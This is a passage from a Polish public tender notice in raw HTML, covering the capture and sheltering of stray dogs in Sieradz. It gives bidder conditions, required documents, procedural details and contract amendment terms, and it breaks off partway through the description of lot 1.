szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:o	dla części nr 1 zamówienia: aktualne zezwolenia na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami oraz prowadzenia schronisk dla bezdomnych zwierząt, zgodnie z art. 7 ust 1 pkt. 3 i 4 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2018 r. poz. 1454 z późniejszymi zmianami).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:o	dla części nr 1: pojazdem przystosowanym do przewozu zwierząt 1 szt., żywołapką 1 szt., klatką do transportu zwierząt 1 szt., lassem do wyłapywania zwierząt 1 szt., noszami do transportu rannych zwierząt 1 szt., aplikatorem do usypiania zwierząt 1 szt.,o	dla części nr 2: pojazdem przystosowanym do przewozu zwierząt 1 szt., klatką do transportu zwierząt 1 szt.,o	dla części nr 3: pojazdem przystosowanym do przewozu zwierząt 1 szt., klatką do transportu zwierząt 1 szt., noszami do transportu rannych zwierząt 1 szt.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek zostanie uznany za spełniony, gdy Wykonawcy łącznie wykażą się dysponowaniem wymaganymi narzędziami, wyposażeniem zakładu lub urządzeniami technicznymi.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,b) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a) dla części nr 1 zamówienia: aktualne zezwolenia na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami oraz prowadzenia schronisk dla bezdomnych zwierząt, zgodnie z art. 7 ust 1 pkt. 3 i 4 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2018 r. poz. 1454 z późniejszymi zmianami).b) dla części nr 1, 2 i 3 zamówienia: wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych należy sporządzić wg załączników nr 5, 5a oraz 5b.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Wzór umowy stanowią załączniki nr 3, 3a i 3b do niniejszej SIWZ:- załącznik nr 3 dotyczy części nr 1 zamówienia,- załącznik nr 3a dotyczy części nr 2 zamówienia,- załącznik nr 3b dotyczy części nr 3 zamówienia.2. Strony zastrzegają możliwość dokonania w uzasadnionych okolicznościach zmian postanowień zawartej umowy. Wszelkie zmiany treści umowy wymagają pod rygorem nieważności zachowania formy pisemnej.3. Zmiana określenia przedmiotu zamówienia w porównaniu do postanowień SIWZ w postępowaniu o udzielenie zamówienia publicznego, w wyniku przeprowadzenia, którego zawarto niniejszą umowę możliwa jest jedynie w przypadku, gdy prowadzi do jego ograniczenia lub zastosowania rozwiązań zamiennych, tj. takich, które nie powodują rozszerzenia określenia przedmiotu zamówienia, prowadzą do jego ulepszenia, usprawnienia jego realizacji lub zastosowania materiałów równoważnych.4. Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy w przypadkach określonych w art. 144 ustawy Pzp.5. Zamawiający przewiduje możliwość zmiany wynagrodzenia umownego w przypadku ustawowej zmiany określonej w umowie procentowej stawki podatku VAT, kwota brutto wynagrodzenia umownego zostanie odpowiednio zmieniona.6. Każda ze stron może wystąpić z propozycją zmian postanowień niniejszej umowy. Propozycja musi wskazywać na okoliczności uzasadniające wprowadzenie zmian.7. Strony ustalają, że Wykonawca nie może bez zgody Zamawiającego dokonać cesji wierzytelności na rzecz osoby trzeciej.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-17</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Oferta musi zostać napisana w języku polskim, na maszynie do pisania, komputerze lub inną trwałą i czytelną techniką. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli Zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>wyłapywanie i utrzymywanie psów z terenu Miasta Sieradza</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest wyłapywanie i utrzymywanie bezdomnych psów z terenu miasta Sieradza, w tym:a) wyłapywanie bezdomnych psów z terenu miasta Sieradza oraz ich dostarczenie do schroniska, w tym:-	wyłapywanie bezdomnych psów z terenu Miasta Sieradza i transport psów do schroniska prowadzonego przez Wykonawcę (podjęcie natychmiastowych działań maksymalnie w ciągu 1 godz. od zgłoszenia) po uprzednim poinformowaniu o tym zdarzeniu Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza, a w godzinach popołudniowych i wieczornych bądź w soboty, niedziele i święta - Straży Miejskiej w Sieradzu - nie więcej niż 100 psów w okresie obowiązywania umowy,-	przekazanie natychmiastowej informacji o wyłapanym zwierzęciu (wraz z co najmniej jednym zdjęciem psa i informacją o miejscu wyłapania) Zamawiającemu, Straży Miejskiej w Sieradzu oraz współpracującym organizacjom pozarządowym działającym w zakresie ochrony zwierząt - informacje powyższe powinny zostać przekazane drogą elektroniczną na adresy podane przez Zamawiającego i ww. organizacje pozarządowe w ciągu 1 godziny od momentu dostarczenia psa do schroniska, -	prowadzenie fanpage przez Wykonawcę w ramach serwisu społecznościowego Facebook oraz umieszczanie zdjęć i opisu wyłapanego psa wraz z informacją o miejscu wyłapania na ww. stronie w ciągu 1 godziny od momentu dostarczenia psa do schroniska,-	utrzymywanie wyłapanych psów w schronisku przez okres do 24 h od momentu dostarczenia psa do schroniska w celu umożliwienia właścicielom odebrania wyłapanego psa,-	